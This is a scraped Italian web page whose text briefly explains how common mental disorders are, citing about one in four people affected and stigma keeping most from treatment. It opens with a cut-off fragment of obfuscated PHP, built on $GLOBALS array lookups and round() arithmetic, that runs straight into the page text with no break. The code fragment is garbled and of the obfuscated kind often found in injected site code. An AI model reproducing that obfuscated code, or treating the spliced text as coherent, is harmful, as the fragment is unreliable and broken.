=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Quanto sono diffusi i disturbi mentali?

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Quanto sono diffusi i disturbi mentali? PDF 

 

I disturbi mentali riguardano persone di qualunque età, cultura, livello sociale, e, tranne qualche eccezione, sia maschi che femmine.

Studi recenti hanno stimato che in media circa una persona su quattro presenta qualche disturbo mentale. Fortunatamente, la maggioranza delle persone che sperimentano questo tipo di problemi riesce a superarli o impara a conviverci, specialmente se ricorre tempestivamente all'aiuto di uno specialista. Purtroppo, altri studi hanno evidenziato che circa i due terzi delle persone affette da disturbi mentali non ricorrere alle cure specialistiche per migliorare la propria condizione, e che, nella maggior parte dei casi, l'ostacolo maggiore è rappresentato dai pregiudizi che circondano la malattia mentale.

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito